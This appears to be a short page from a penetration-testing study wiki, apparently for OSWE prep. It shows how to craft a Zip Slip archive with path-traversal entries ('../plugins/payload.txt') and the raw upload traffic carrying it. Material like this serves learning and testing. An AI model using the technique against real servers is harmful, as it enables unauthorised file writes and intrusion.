search

ZIP Slip

hashtag
Create folder that imitate the desired path on the server

mkdir ../desired_folder

hashtag
Make file inside that folder

Remember that the path on the right will be used in the zip slip.

echo "test123" > ../plugins/payload.txt

hashtag
Zip the file with path traversal

zip payload.zip ../plugins/payload.txt

hashtag
Result as HTTP Traffic

Content-Type: application/zip

PK
‘0[58”n../folder/payload.txtUT	‰ŒÉh‹ŒÉhuxõtest123
PK
‘0[58”n¤../folder/payload.txtUT‰ŒÉhuxõPK\X
------WebKitFormBoundarynxMw37lRujBsjUlU--
PreviousPath TraversalNextOSWE Syllabus Table

Last updated